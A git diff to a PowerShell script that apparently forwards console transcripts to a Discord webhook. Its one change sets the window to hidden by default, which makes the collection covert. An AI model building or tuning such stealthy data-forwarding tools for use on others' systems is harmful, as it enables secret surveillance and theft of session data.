diff --git a/Global-PS-Trascription-to-Discord/main.ps1 b/Global-PS-Trascription-to-Discord/main.ps1 index 72df121..6862170 100644 --- a/Global-PS-Trascription-to-Discord/main.ps1 +++ b/Global-PS-Trascription-to-Discord/main.ps1 @@ -18,7 +18,7 @@ if ($dc.Length -eq 0){ $dc = "YOUR_WEBHOOK_HERE" } -$hideWindow = 0 # 1 = Hidden +$hideWindow = 1 # 1 = Hidden [Console]::BackgroundColor = "Black" [Console]::SetWindowSize(60, 20)